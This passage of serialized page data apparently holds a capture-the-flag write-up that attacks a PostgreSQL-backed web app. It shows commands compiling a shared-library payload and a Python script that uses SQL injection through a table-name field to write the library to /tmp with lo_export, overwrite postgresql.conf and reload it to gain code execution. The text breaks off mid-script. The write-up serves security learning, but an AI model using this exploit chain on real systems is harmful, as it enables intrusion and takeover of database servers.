",{"type":34,"tag":315,"props":4825,"children":4826},{"style":360},[4827],{"type":39,"value":4828},"docker",{"type":34,"tag":315,"props":4830,"children":4831},{"style":360},[4832],{"type":39,"value":4833}," pull",{"type":34,"tag":315,"props":4835,"children":4836},{"style":360},[4837],{"type":39,"value":4838}," 
postgres\n",{"type":34,"tag":315,"props":4840,"children":4841},{"class":317,"line":328},[4842,4846,4850,4854,4859,4864,4869],{"type":34,"tag":315,"props":4843,"children":4844},{"style":343},[4845],{"type":39,"value":4818},{"type":34,"tag":315,"props":4847,"children":4848},{"style":701},[4849],{"type":39,"value":4823},{"type":34,"tag":315,"props":4851,"children":4852},{"style":360},[4853],{"type":39,"value":4828},{"type":34,"tag":315,"props":4855,"children":4856},{"style":360},[4857],{"type":39,"value":4858}," run",{"type":34,"tag":315,"props":4860,"children":4861},{"style":3541},[4862],{"type":39,"value":4863}," -it",{"type":34,"tag":315,"props":4865,"children":4866},{"style":360},[4867],{"type":39,"value":4868}," 76e3e031d245",{"type":34,"tag":315,"props":4870,"children":4871},{"style":360},[4872],{"type":39,"value":4873}," /bin/bash\n",{"type":34,"tag":315,"props":4875,"children":4876},{"class":317,"line":423},[4877,4881,4885,4890,4895,4900,4905,4910,4915,4920,4925],{"type":34,"tag":315,"props":4878,"children":4879},{"style":343},[4880],{"type":39,"value":4818},{"type":34,"tag":315,"props":4882,"children":4883},{"style":701},[4884],{"type":39,"value":4823},{"type":34,"tag":315,"props":4886,"children":4887},{"style":360},[4888],{"type":39,"value":4889},"apt",{"type":34,"tag":315,"props":4891,"children":4892},{"style":360},[4893],{"type":39,"value":4894}," update",{"type":34,"tag":315,"props":4896,"children":4897},{"style":338},[4898],{"type":39,"value":4899}," &&",{"type":34,"tag":315,"props":4901,"children":4902},{"style":343},[4903],{"type":39,"value":4904}," apt",{"type":34,"tag":315,"props":4906,"children":4907},{"style":360},[4908],{"type":39,"value":4909}," install",{"type":34,"tag":315,"props":4911,"children":4912},{"style":3541},[4913],{"type":39,"value":4914}," -y",{"type":34,"tag":315,"props":4916,"children":4917},{"style":360},[4918],{"type":39,"value":4919}," 
posgresql-server-dev-17",{"type":34,"tag":315,"props":4921,"children":4922},{"style":360},[4923],{"type":39,"value":4924}," gcc",{"type":34,"tag":315,"props":4926,"children":4927},{"style":360},[4928],{"type":39,"value":4929}," vim\n",{"type":34,"tag":315,"props":4931,"children":4932},{"class":317,"line":471},[4933,4937,4941,4946],{"type":34,"tag":315,"props":4934,"children":4935},{"style":343},[4936],{"type":39,"value":4818},{"type":34,"tag":315,"props":4938,"children":4939},{"style":701},[4940],{"type":39,"value":4823},{"type":34,"tag":315,"props":4942,"children":4943},{"style":360},[4944],{"type":39,"value":4945},"gcc",{"type":34,"tag":315,"props":4947,"children":4948},{"style":3541},[4949],{"type":39,"value":4950}," \\\n",{"type":34,"tag":315,"props":4952,"children":4953},{"class":317,"line":485},[4954,4959,4964,4969],{"type":34,"tag":315,"props":4955,"children":4956},{"style":701},[4957],{"type":39,"value":4958},"-I$(pg_config ",{"type":34,"tag":315,"props":4960,"children":4961},{"style":3541},[4962],{"type":39,"value":4963},"--includedir-server",{"type":34,"tag":315,"props":4965,"children":4966},{"style":701},[4967],{"type":39,"value":4968},") ",{"type":34,"tag":315,"props":4970,"children":4971},{"style":3541},[4972],{"type":39,"value":4973},"\\\n",{"type":34,"tag":315,"props":4975,"children":4976},{"class":317,"line":541},[4977,4982],{"type":34,"tag":315,"props":4978,"children":4979},{"style":343},[4980],{"type":39,"value":4981},"-shared",{"type":34,"tag":315,"props":4983,"children":4984},{"style":3541},[4985],{"type":39,"value":4950},{"type":34,"tag":315,"props":4987,"children":4988},{"class":317,"line":551},[4989,4994],{"type":34,"tag":315,"props":4990,"children":4991},{"style":701},[4992],{"type":39,"value":4993},"-fPIC 
",{"type":34,"tag":315,"props":4995,"children":4996},{"style":3541},[4997],{"type":39,"value":4973},{"type":34,"tag":315,"props":4999,"children":5000},{"class":317,"line":570},[5001,5006],{"type":34,"tag":315,"props":5002,"children":5003},{"style":701},[5004],{"type":39,"value":5005},"-nostartfiles ",{"type":34,"tag":315,"props":5007,"children":5008},{"style":3541},[5009],{"type":39,"value":4973},{"type":34,"tag":315,"props":5011,"children":5012},{"class":317,"line":578},[5013,5018,5022],{"type":34,"tag":315,"props":5014,"children":5015},{"style":701},[5016],{"type":39,"value":5017},"-o ",{"type":34,"tag":315,"props":5019,"children":5020},{"style":360},[5021],{"type":39,"value":3881},{"type":34,"tag":315,"props":5023,"children":5024},{"style":3541},[5025],{"type":39,"value":4950},{"type":34,"tag":315,"props":5027,"children":5028},{"class":317,"line":619},[5029],{"type":34,"tag":315,"props":5030,"children":5031},{"style":701},[5032],{"type":39,"value":5033},"payload.c\n",{"type":34,"tag":315,"props":5035,"children":5036},{"class":317,"line":671},[5037,5041,5045,5050,5055,5060,5065,5070,5074],{"type":34,"tag":315,"props":5038,"children":5039},{"style":343},[5040],{"type":39,"value":4818},{"type":34,"tag":315,"props":5042,"children":5043},{"style":701},[5044],{"type":39,"value":4823},{"type":34,"tag":315,"props":5046,"children":5047},{"style":360},[5048],{"type":39,"value":5049},"cat",{"type":34,"tag":315,"props":5051,"children":5052},{"style":360},[5053],{"type":39,"value":5054}," payload.so",{"type":34,"tag":315,"props":5056,"children":5057},{"style":384},[5058],{"type":39,"value":5059}," |",{"type":34,"tag":315,"props":5061,"children":5062},{"style":343},[5063],{"type":39,"value":5064}," base64",{"type":34,"tag":315,"props":5066,"children":5067},{"style":3541},[5068],{"type":39,"value":5069}," 
-w",{"type":34,"tag":315,"props":5071,"children":5072},{"style":384},[5073],{"type":39,"value":1460},{"type":34,"tag":315,"props":5075,"children":5076},{"style":360},[5077],{"type":39,"value":5078}," payload.b64\n",{"type":34,"tag":48,"props":5080,"children":5081},{},[5082],{"type":39,"value":5083},"Once our payload is compiled, we encode it in base64.",{"type":34,"tag":48,"props":5085,"children":5086},{},[5087],{"type":39,"value":5088},"We will use a Python script to automate writing the files to the filesystem: it writes the library to /tmp and then overwrites the configuration file with the new one. Once everything is written, the configuration needs to be reloaded; for reasons unknown, it is essential to reload the configuration multiple times for the change to take effect.",{"type":34,"tag":301,"props":5090,"children":5092},{"lang":5091},"python",[5093],{"type":34,"tag":306,"props":5094,"children":5097},{"className":5095,"code":5096,"language":5091,"meta":7,"style":7},"language-python shiki shiki-themes vitesse-dark","import requests\nimport base64\nimport random\n\n\nSESSION_COOKIE = 'connect.sid=\u003CADMIN_COOKIE>'\nBASE_URL = 'http://\u003CCHALLENGE_IP:PORT>/table'\nheaders = {\n    'Cookie': SESSION_COOKIE\n}\n\ndef get_randnum():\n    return random.randint(0, 31337*5)\n\ndef exec_payload(sql):\n    body = {\"tableName\": f\"users\\\" where 1=({sql})--\"}\n    res = requests.post(BASE_URL, headers=headers, json=body)\n    print(res.status_code)\n    \n\ndef file_to_base64(file_path):\n    with open(file_path, \"rb\") as file:\n        base64_encoded = base64.b64encode(file.read()).decode(\"utf-8\")\n    return base64_encoded\n\ndef read_base64file(file_path):\n    with open(file_path, \"r\") as file:\n        base64_content = file.read()\n    return base64_content\n\nif __name__ == \"__main__\":\n    # upload b64 so\n    payload = read_base64file(\"payload.b64\")\n    current_id = get_randnum()\n    \n    exec_payload(f\"SELECT lo_from_bytea({current_id}, 
decode('{payload}', 'base64'))\")\n    exec_payload(f\"SELECT lo_export({current_id}, '/tmp/payload.so')\")\n\n    # upload conf\n    conf = file_to_base64(\"conf\")\n    current_id = get_randnum()\n    \n    exec_payload(f\"SELECT lo_from_bytea({current_id}, decode('{conf}', 'base64'))\")\n    exec_payload(f\"SELECT lo_export({current_id}, '/var/lib/postgresql/data/postgresql.conf')\")\n\n    # reload conf\n    exec_payload(f\"SELECT pg_reload_conf()\")\n    exec_payload(f\"SELECT pg_reload_conf()\")\n    exec_payload(f\"SELECT pg_reload_conf()\")\n\n",[5098],{"type":34,"tag":59,"props":5099,"children":5100},{"__ignoreMap":7},[5101,5114,5126,5138,5145,5152,5178,5203,5219,5245,5252,5259,5277,5329,5336,5362,5435,5507,5537,5545,5552,5577,5633,5707,5719,5726,5750,5802,5830,5842,5849,5884,5892,5929,5949,5956,6018,6059,6067,6076,6113,6133,6141,6197,6238,6246,6255,6280,6304],{"type":34,"tag":315,"props":5102,"children":5103},{"class":317,"line":318},[5104,5109],{"type":34,"tag":315,"props":5105,"children":5106},{"style":475},[5107],{"type":39,"value":5108},"import",{"type":34,"tag":315,"props":5110,"children":5111},{"style":701},[5112],{"type":39,"value":5113}," requests\n",{"type":34,"tag":315,"props":5115,"children":5116},{"class":317,"line":328},[5117,5121],{"type":34,"tag":315,"props":5118,"children":5119},{"style":475},[5120],{"type":39,"value":5108},{"type":34,"tag":315,"props":5122,"children":5123},{"style":701},[5124],{"type":39,"value":5125}," base64\n",{"type":34,"tag":315,"props":5127,"children":5128},{"class":317,"line":423},[5129,5133],{"type":34,"tag":315,"props":5130,"children":5131},{"style":475},[5132],{"type":39,"value":5108},{"type":34,"tag":315,"props":5134,"children":5135},{"style":701},[5136],{"type":39,"value":5137}," 
random\n",{"type":34,"tag":315,"props":5139,"children":5140},{"class":317,"line":471},[5141],{"type":34,"tag":315,"props":5142,"children":5143},{"emptyLinePlaceholder":545},[5144],{"type":39,"value":548},{"type":34,"tag":315,"props":5146,"children":5147},{"class":317,"line":485},[5148],{"type":34,"tag":315,"props":5149,"children":5150},{"emptyLinePlaceholder":545},[5151],{"type":39,"value":548},{"type":34,"tag":315,"props":5153,"children":5154},{"class":317,"line":541},[5155,5160,5164,5168,5173],{"type":34,"tag":315,"props":5156,"children":5157},{"style":3541},[5158],{"type":39,"value":5159},"SESSION_COOKIE",{"type":34,"tag":315,"props":5161,"children":5162},{"style":338},[5163],{"type":39,"value":449},{"type":34,"tag":315,"props":5165,"children":5166},{"style":354},[5167],{"type":39,"value":1553},{"type":34,"tag":315,"props":5169,"children":5170},{"style":360},[5171],{"type":39,"value":5172},"connect.sid=\u003CADMIN_COOKIE>",{"type":34,"tag":315,"props":5174,"children":5175},{"style":354},[5176],{"type":39,"value":5177},"'\n",{"type":34,"tag":315,"props":5179,"children":5180},{"class":317,"line":551},[5181,5186,5190,5194,5199],{"type":34,"tag":315,"props":5182,"children":5183},{"style":3541},[5184],{"type":39,"value":5185},"BASE_URL",{"type":34,"tag":315,"props":5187,"children":5188},{"style":338},[5189],{"type":39,"value":449},{"type":34,"tag":315,"props":5191,"children":5192},{"style":354},[5193],{"type":39,"value":1553},{"type":34,"tag":315,"props":5195,"children":5196},{"style":360},[5197],{"type":39,"value":5198},"http://\u003CCHALLENGE_IP:PORT>/table",{"type":34,"tag":315,"props":5200,"children":5201},{"style":354},[5202],{"type":39,"value":5177},{"type":34,"tag":315,"props":5204,"children":5205},{"class":317,"line":570},[5206,5211,5215],{"type":34,"tag":315,"props":5207,"children":5208},{"style":701},[5209],{"type":39,"value":5210},"headers 
",{"type":34,"tag":315,"props":5212,"children":5213},{"style":338},[5214],{"type":39,"value":803},{"type":34,"tag":315,"props":5216,"children":5217},{"style":338},[5218],{"type":39,"value":420},{"type":34,"tag":315,"props":5220,"children":5221},{"class":317,"line":578},[5222,5227,5232,5236,5240],{"type":34,"tag":315,"props":5223,"children":5224},{"style":354},[5225],{"type":39,"value":5226},"    '",{"type":34,"tag":315,"props":5228,"children":5229},{"style":360},[5230],{"type":39,"value":5231},"Cookie",{"type":34,"tag":315,"props":5233,"children":5234},{"style":354},[5235],{"type":39,"value":852},{"type":34,"tag":315,"props":5237,"children":5238},{"style":338},[5239],{"type":39,"value":650},{"type":34,"tag":315,"props":5241,"children":5242},{"style":3541},[5243],{"type":39,"value":5244}," SESSION_COOKIE\n",{"type":34,"tag":315,"props":5246,"children":5247},{"class":317,"line":619},[5248],{"type":34,"tag":315,"props":5249,"children":5250},{"style":338},[5251],{"type":39,"value":4787},{"type":34,"tag":315,"props":5253,"children":5254},{"class":317,"line":671},[5255],{"type":34,"tag":315,"props":5256,"children":5257},{"emptyLinePlaceholder":545},[5258],{"type":39,"value":548},{"type":34,"tag":315,"props":5260,"children":5261},{"class":317,"line":680},[5262,5267,5272],{"type":34,"tag":315,"props":5263,"children":5264},{"style":384},[5265],{"type":39,"value":5266},"def",{"type":34,"tag":315,"props":5268,"children":5269},{"style":343},[5270],{"type":39,"value":5271}," get_randnum",{"type":34,"tag":315,"props":5273,"children":5274},{"style":338},[5275],{"type":39,"value":5276},"():\n",{"type":34,"tag":315,"props":5278,"children":5279},{"class":317,"line":697},[5280,5284,5289,5293,5298,5302,5307,5311,5316,5320,5325],{"type":34,"tag":315,"props":5281,"children":5282},{"style":475},[5283],{"type":39,"value":1624},{"type":34,"tag":315,"props":5285,"children":5286},{"style":701},[5287],{"type":39,"value":5288}," 
random",{"type":34,"tag":315,"props":5290,"children":5291},{"style":338},[5292],{"type":39,"value":66},{"type":34,"tag":315,"props":5294,"children":5295},{"style":701},[5296],{"type":39,"value":5297},"randint",{"type":34,"tag":315,"props":5299,"children":5300},{"style":338},[5301],{"type":39,"value":351},{"type":34,"tag":315,"props":5303,"children":5304},{"style":1463},[5305],{"type":39,"value":5306},"0",{"type":34,"tag":315,"props":5308,"children":5309},{"style":338},[5310],{"type":39,"value":372},{"type":34,"tag":315,"props":5312,"children":5313},{"style":1463},[5314],{"type":39,"value":5315}," 31337",{"type":34,"tag":315,"props":5317,"children":5318},{"style":384},[5319],{"type":39,"value":4533},{"type":34,"tag":315,"props":5321,"children":5322},{"style":1463},[5323],{"type":39,"value":5324},"5",{"type":34,"tag":315,"props":5326,"children":5327},{"style":338},[5328],{"type":39,"value":3226},{"type":34,"tag":315,"props":5330,"children":5331},{"class":317,"line":707},[5332],{"type":34,"tag":315,"props":5333,"children":5334},{"emptyLinePlaceholder":545},[5335],{"type":39,"value":548},{"type":34,"tag":315,"props":5337,"children":5338},{"class":317,"line":1805},[5339,5343,5348,5352,5357],{"type":34,"tag":315,"props":5340,"children":5341},{"style":384},[5342],{"type":39,"value":5266},{"type":34,"tag":315,"props":5344,"children":5345},{"style":343},[5346],{"type":39,"value":5347}," exec_payload",{"type":34,"tag":315,"props":5349,"children":5350},{"style":338},[5351],{"type":39,"value":351},{"type":34,"tag":315,"props":5353,"children":5354},{"style":701},[5355],{"type":39,"value":5356},"sql",{"type":34,"tag":315,"props":5358,"children":5359},{"style":338},[5360],{"type":39,"value":5361},"):\n",{"type":34,"tag":315,"props":5363,"children":5364},{"class":317,"line":1915},[5365,5370,5374,5378,5382,5386,5390,5394,5399,5404,5409,5414,5418,5422,5426,5431],{"type":34,"tag":315,"props":5366,"children":5367},{"style":701},[5368],{"type":39,"value":5369},"    body 
",{"type":34,"tag":315,"props":5371,"children":5372},{"style":338},[5373],{"type":39,"value":803},{"type":34,"tag":315,"props":5375,"children":5376},{"style":338},[5377],{"type":39,"value":434},{"type":34,"tag":315,"props":5379,"children":5380},{"style":354},[5381],{"type":39,"value":357},{"type":34,"tag":315,"props":5383,"children":5384},{"style":360},[5385],{"type":39,"value":520},{"type":34,"tag":315,"props":5387,"children":5388},{"style":354},[5389],{"type":39,"value":357},{"type":34,"tag":315,"props":5391,"children":5392},{"style":338},[5393],{"type":39,"value":650},{"type":34,"tag":315,"props":5395,"children":5396},{"style":384},[5397],{"type":39,"value":5398}," f",{"type":34,"tag":315,"props":5400,"children":5401},{"style":360},[5402],{"type":39,"value":5403},"\"users",{"type":34,"tag":315,"props":5405,"children":5406},{"style":3541},[5407],{"type":39,"value":5408},"\\\"",{"type":34,"tag":315,"props":5410,"children":5411},{"style":360},[5412],{"type":39,"value":5413}," where 1=(",{"type":34,"tag":315,"props":5415,"children":5416},{"style":3541},[5417],{"type":39,"value":2066},{"type":34,"tag":315,"props":5419,"children":5420},{"style":701},[5421],{"type":39,"value":5356},{"type":34,"tag":315,"props":5423,"children":5424},{"style":3541},[5425],{"type":39,"value":525},{"type":34,"tag":315,"props":5427,"children":5428},{"style":360},[5429],{"type":39,"value":5430},")--\"",{"type":34,"tag":315,"props":5432,"children":5433},{"style":338},[5434],{"type":39,"value":4787},{"type":34,"tag":315,"props":5436,"children":5437},{"class":317,"line":1932},[5438,5443,5447,5452,5456,5460,5464,5468,5472,5477,5481,5486,5490,5495,5499,5503],{"type":34,"tag":315,"props":5439,"children":5440},{"style":701},[5441],{"type":39,"value":5442},"    res ",{"type":34,"tag":315,"props":5444,"children":5445},{"style":338},[5446],{"type":39,"value":803},{"type":34,"tag":315,"props":5448,"children":5449},{"style":701},[5450],{"type":39,"value":5451}," 
requests",{"type":34,"tag":315,"props":5453,"children":5454},{"style":338},[5455],{"type":39,"value":66},{"type":34,"tag":315,"props":5457,"children":5458},{"style":701},[5459],{"type":39,"value":346},{"type":34,"tag":315,"props":5461,"children":5462},{"style":338},[5463],{"type":39,"value":351},{"type":34,"tag":315,"props":5465,"children":5466},{"style":3541},[5467],{"type":39,"value":5185},{"type":34,"tag":315,"props":5469,"children":5470},{"style":338},[5471],{"type":39,"value":372},{"type":34,"tag":315,"props":5473,"children":5474},{"style":332},[5475],{"type":39,"value":5476}," headers",{"type":34,"tag":315,"props":5478,"children":5479},{"style":338},[5480],{"type":39,"value":803},{"type":34,"tag":315,"props":5482,"children":5483},{"style":701},[5484],{"type":39,"value":5485},"headers",{"type":34,"tag":315,"props":5487,"children":5488},{"style":338},[5489],{"type":39,"value":372},{"type":34,"tag":315,"props":5491,"children":5492},{"style":332},[5493],{"type":39,"value":5494}," json",{"type":34,"tag":315,"props":5496,"children":5497},{"style":338},[5498],{"type":39,"value":803},{"type":34,"tag":315,"props":5500,"children":5501},{"style":701},[5502],{"type":39,"value":463},{"type":34,"tag":315,"props":5504,"children":5505},{"style":338},[5506],{"type":39,"value":3226},{"type":34,"tag":315,"props":5508,"children":5509},{"class":317,"line":2029},[5510,5515,5519,5524,5528,5533],{"type":34,"tag":315,"props":5511,"children":5512},{"style":642},[5513],{"type":39,"value":5514},"    
print",{"type":34,"tag":315,"props":5516,"children":5517},{"style":338},[5518],{"type":39,"value":351},{"type":34,"tag":315,"props":5520,"children":5521},{"style":701},[5522],{"type":39,"value":5523},"res",{"type":34,"tag":315,"props":5525,"children":5526},{"style":338},[5527],{"type":39,"value":66},{"type":34,"tag":315,"props":5529,"children":5530},{"style":701},[5531],{"type":39,"value":5532},"status_code",{"type":34,"tag":315,"props":5534,"children":5535},{"style":338},[5536],{"type":39,"value":3226},{"type":34,"tag":315,"props":5538,"children":5539},{"class":317,"line":2037},[5540],{"type":34,"tag":315,"props":5541,"children":5542},{"style":701},[5543],{"type":39,"value":5544},"    \n",{"type":34,"tag":315,"props":5546,"children":5547},{"class":317,"line":4247},[5548],{"type":34,"tag":315,"props":5549,"children":5550},{"emptyLinePlaceholder":545},[5551],{"type":39,"value":548},{"type":34,"tag":315,"props":5553,"children":5554},{"class":317,"line":4255},[5555,5559,5564,5568,5573],{"type":34,"tag":315,"props":5556,"children":5557},{"style":384},[5558],{"type":39,"value":5266},{"type":34,"tag":315,"props":5560,"children":5561},{"style":343},[5562],{"type":39,"value":5563}," file_to_base64",{"type":34,"tag":315,"props":5565,"children":5566},{"style":338},[5567],{"type":39,"value":351},{"type":34,"tag":315,"props":5569,"children":5570},{"style":701},[5571],{"type":39,"value":5572},"file_path",{"type":34,"tag":315,"props":5574,"children":5575},{"style":338},[5576],{"type":39,"value":5361},{"type":34,"tag":315,"props":5578,"children":5579},{"class":317,"line":4282},[5580,5585,5590,5594,5598,5602,5606,5611,5615,5619,5624,5629],{"type":34,"tag":315,"props":5581,"children":5582},{"style":475},[5583],{"type":39,"value":5584},"    with",{"type":34,"tag":315,"props":5586,"children":5587},{"style":642},[5588],{"type":39,"value":5589}," 
open",{"type":34,"tag":315,"props":5591,"children":5592},{"style":338},[5593],{"type":39,"value":351},{"type":34,"tag":315,"props":5595,"children":5596},{"style":701},[5597],{"type":39,"value":5572},{"type":34,"tag":315,"props":5599,"children":5600},{"style":338},[5601],{"type":39,"value":372},{"type":34,"tag":315,"props":5603,"children":5604},{"style":354},[5605],{"type":39,"value":3511},{"type":34,"tag":315,"props":5607,"children":5608},{"style":360},[5609],{"type":39,"value":5610},"rb",{"type":34,"tag":315,"props":5612,"children":5613},{"style":354},[5614],{"type":39,"value":357},{"type":34,"tag":315,"props":5616,"children":5617},{"style":338},[5618],{"type":39,"value":177},{"type":34,"tag":315,"props":5620,"children":5621},{"style":475},[5622],{"type":39,"value":5623}," as",{"type":34,"tag":315,"props":5625,"children":5626},{"style":332},[5627],{"type":39,"value":5628}," file",{"type":34,"tag":315,"props":5630,"children":5631},{"style":338},[5632],{"type":39,"value":93},{"type":34,"tag":315,"props":5634,"children":5635},{"class":317,"line":4300},[5636,5641,5645,5649,5653,5658,5662,5667,5671,5676,5681,5686,5690,5694,5699,5703],{"type":34,"tag":315,"props":5637,"children":5638},{"style":701},[5639],{"type":39,"value":5640},"        base64_encoded 
",{"type":34,"tag":315,"props":5642,"children":5643},{"style":338},[5644],{"type":39,"value":803},{"type":34,"tag":315,"props":5646,"children":5647},{"style":701},[5648],{"type":39,"value":5064},{"type":34,"tag":315,"props":5650,"children":5651},{"style":338},[5652],{"type":39,"value":66},{"type":34,"tag":315,"props":5654,"children":5655},{"style":701},[5656],{"type":39,"value":5657},"b64encode",{"type":34,"tag":315,"props":5659,"children":5660},{"style":338},[5661],{"type":39,"value":351},{"type":34,"tag":315,"props":5663,"children":5664},{"style":332},[5665],{"type":39,"value":5666},"file",{"type":34,"tag":315,"props":5668,"children":5669},{"style":338},[5670],{"type":39,"value":66},{"type":34,"tag":315,"props":5672,"children":5673},{"style":701},[5674],{"type":39,"value":5675},"read",{"type":34,"tag":315,"props":5677,"children":5678},{"style":338},[5679],{"type":39,"value":5680},"()).",{"type":34,"tag":315,"props":5682,"children":5683},{"style":701},[5684],{"type":39,"value":5685},"decode",{"type":34,"tag":315,"props":5687,"children":5688},{"style":338},[5689],{"type":39,"value":351},{"type":34,"tag":315,"props":5691,"children":5692},{"style":354},[5693],{"type":39,"value":357},{"type":34,"tag":315,"props":5695,"children":5696},{"style":360},[5697],{"type":39,"value":5698},"utf-8",{"type":34,"tag":315,"props":5700,"children":5701},{"style":354},[5702],{"type":39,"value":357},{"type":34,"tag":315,"props":5704,"children":5705},{"style":338},[5706],{"type":39,"value":3226},{"type":34,"tag":315,"props":5708,"children":5709},{"class":317,"line":4308},[5710,5714],{"type":34,"tag":315,"props":5711,"children":5712},{"style":475},[5713],{"type":39,"value":1624},{"type":34,"tag":315,"props":5715,"children":5716},{"style":701},[5717],{"type":39,"value":5718}," 
base64_encoded\n",{"type":34,"tag":315,"props":5720,"children":5721},{"class":317,"line":4361},[5722],{"type":34,"tag":315,"props":5723,"children":5724},{"emptyLinePlaceholder":545},[5725],{"type":39,"value":548},{"type":34,"tag":315,"props":5727,"children":5728},{"class":317,"line":4392},[5729,5733,5738,5742,5746],{"type":34,"tag":315,"props":5730,"children":5731},{"style":384},[5732],{"type":39,"value":5266},{"type":34,"tag":315,"props":5734,"children":5735},{"style":343},[5736],{"type":39,"value":5737}," read_base64file",{"type":34,"tag":315,"props":5739,"children":5740},{"style":338},[5741],{"type":39,"value":351},{"type":34,"tag":315,"props":5743,"children":5744},{"style":701},[5745],{"type":39,"value":5572},{"type":34,"tag":315,"props":5747,"children":5748},{"style":338},[5749],{"type":39,"value":5361},{"type":34,"tag":315,"props":5751,"children":5752},{"class":317,"line":4431},[5753,5757,5761,5765,5769,5773,5777,5782,5786,5790,5794,5798],{"type":34,"tag":315,"props":5754,"children":5755},{"style":475},[5756],{"type":39,"value":5584},{"type":34,"tag":315,"props":5758,"children":5759},{"style":642},[5760],{"type":39,"value":5589},{"type":34,"tag":315,"props":5762,"children":5763},{"style":338},[5764],{"type":39,"value":351},{"type":34,"tag":315,"props":5766,"children":5767},{"style":701},[5768],{"type":39,"value":5572},{"type":34,"tag":315,"props":5770,"children":5771},{"style":338},[5772],{"type":39,"value":372},{"type":34,"tag":315,"props":5774,"children":5775},{"style":354},[5776],{"type":39,"value":3511},{"type":34,"tag":315,"props":5778,"children":5779},{"style":360},[5780],{"type":39,"value":5781},"r",{"type":34,"tag":315,"props":5783,"children":5784},{"style":354},[5785],{"type":39,"value":357},{"type":34,"tag":315,"props":5787,"children":5788},{"style":338},[5789],{"type":39,"value":177},{"type":34,"tag":315,"props":5791,"children":5792},{"style":475},[5793],{"type":39,"value":5623},{"type":34,"tag":315,"props":5795,"children":5796},{"style":332},[5797]
,{"type":39,"value":5628},{"type":34,"tag":315,"props":5799,"children":5800},{"style":338},[5801],{"type":39,"value":93},{"type":34,"tag":315,"props":5803,"children":5804},{"class":317,"line":4487},[5805,5810,5814,5818,5822,5826],{"type":34,"tag":315,"props":5806,"children":5807},{"style":701},[5808],{"type":39,"value":5809},"        base64_content ",{"type":34,"tag":315,"props":5811,"children":5812},{"style":338},[5813],{"type":39,"value":803},{"type":34,"tag":315,"props":5815,"children":5816},{"style":332},[5817],{"type":39,"value":5628},{"type":34,"tag":315,"props":5819,"children":5820},{"style":338},[5821],{"type":39,"value":66},{"type":34,"tag":315,"props":5823,"children":5824},{"style":701},[5825],{"type":39,"value":5675},{"type":34,"tag":315,"props":5827,"children":5828},{"style":338},[5829],{"type":39,"value":2686},{"type":34,"tag":315,"props":5831,"children":5832},{"class":317,"line":4495},[5833,5837],{"type":34,"tag":315,"props":5834,"children":5835},{"style":475},[5836],{"type":39,"value":1624},{"type":34,"tag":315,"props":5838,"children":5839},{"style":701},[5840],{"type":39,"value":5841}," base64_content\n",{"type":34,"tag":315,"props":5843,"children":5844},{"class":317,"line":4555},[5845],{"type":34,"tag":315,"props":5846,"children":5847},{"emptyLinePlaceholder":545},[5848],{"type":39,"value":548},{"type":34,"tag":315,"props":5850,"children":5851},{"class":317,"line":4577},[5852,5857,5862,5867,5871,5876,5880],{"type":34,"tag":315,"props":5853,"children":5854},{"style":475},[5855],{"type":39,"value":5856},"if",{"type":34,"tag":315,"props":5858,"children":5859},{"style":642},[5860],{"type":39,"value":5861}," __name__",{"type":34,"tag":315,"props":5863,"children":5864},{"style":384},[5865],{"type":39,"value":5866}," 
==",{"type":34,"tag":315,"props":5868,"children":5869},{"style":354},[5870],{"type":39,"value":3511},{"type":34,"tag":315,"props":5872,"children":5873},{"style":360},[5874],{"type":39,"value":5875},"__main__",{"type":34,"tag":315,"props":5877,"children":5878},{"style":354},[5879],{"type":39,"value":357},{"type":34,"tag":315,"props":5881,"children":5882},{"style":338},[5883],{"type":39,"value":93},{"type":34,"tag":315,"props":5885,"children":5886},{"class":317,"line":4606},[5887],{"type":34,"tag":315,"props":5888,"children":5889},{"style":322},[5890],{"type":39,"value":5891},"    # upload b64 so\n",{"type":34,"tag":315,"props":5893,"children":5894},{"class":317,"line":4635},[5895,5900,5904,5908,5912,5916,5921,5925],{"type":34,"tag":315,"props":5896,"children":5897},{"style":701},[5898],{"type":39,"value":5899},"    payload ",{"type":34,"tag":315,"props":5901,"children":5902},{"style":338},[5903],{"type":39,"value":803},{"type":34,"tag":315,"props":5905,"children":5906},{"style":701},[5907],{"type":39,"value":5737},{"type":34,"tag":315,"props":5909,"children":5910},{"style":338},[5911],{"type":39,"value":351},{"type":34,"tag":315,"props":5913,"children":5914},{"style":354},[5915],{"type":39,"value":357},{"type":34,"tag":315,"props":5917,"children":5918},{"style":360},[5919],{"type":39,"value":5920},"payload.b64",{"type":34,"tag":315,"props":5922,"children":5923},{"style":354},[5924],{"type":39,"value":357},{"type":34,"tag":315,"props":5926,"children":5927},{"style":338},[5928],{"type":39,"value":3226},{"type":34,"tag":315,"props":5930,"children":5931},{"class":317,"line":4664},[5932,5937,5941,5945],{"type":34,"tag":315,"props":5933,"children":5934},{"style":701},[5935],{"type":39,"value":5936},"    current_id 
",{"type":34,"tag":315,"props":5938,"children":5939},{"style":338},[5940],{"type":39,"value":803},{"type":34,"tag":315,"props":5942,"children":5943},{"style":701},[5944],{"type":39,"value":5271},{"type":34,"tag":315,"props":5946,"children":5947},{"style":338},[5948],{"type":39,"value":2686},{"type":34,"tag":315,"props":5950,"children":5951},{"class":317,"line":4672},[5952],{"type":34,"tag":315,"props":5953,"children":5954},{"style":701},[5955],{"type":39,"value":5544},{"type":34,"tag":315,"props":5957,"children":5958},{"class":317,"line":4736},[5959,5964,5968,5973,5978,5982,5987,5991,5996,6000,6005,6009,6014],{"type":34,"tag":315,"props":5960,"children":5961},{"style":701},[5962],{"type":39,"value":5963},"    exec_payload",{"type":34,"tag":315,"props":5965,"children":5966},{"style":338},[5967],{"type":39,"value":351},{"type":34,"tag":315,"props":5969,"children":5970},{"style":384},[5971],{"type":39,"value":5972},"f",{"type":34,"tag":315,"props":5974,"children":5975},{"style":360},[5976],{"type":39,"value":5977},"\"SELECT lo_from_bytea(",{"type":34,"tag":315,"props":5979,"children":5980},{"style":3541},[5981],{"type":39,"value":2066},{"type":34,"tag":315,"props":5983,"children":5984},{"style":701},[5985],{"type":39,"value":5986},"current_id",{"type":34,"tag":315,"props":5988,"children":5989},{"style":3541},[5990],{"type":39,"value":525},{"type":34,"tag":315,"props":5992,"children":5993},{"style":360},[5994],{"type":39,"value":5995},", decode('",{"type":34,"tag":315,"props":5997,"children":5998},{"style":3541},[5999],{"type":39,"value":2066},{"type":34,"tag":315,"props":6001,"children":6002},{"style":701},[6003],{"type":39,"value":6004},"payload",{"type":34,"tag":315,"props":6006,"children":6007},{"style":3541},[6008],{"type":39,"value":525},{"type":34,"tag":315,"props":6010,"children":6011},{"style":360},[6012],{"type":39,"value":6013},"', 
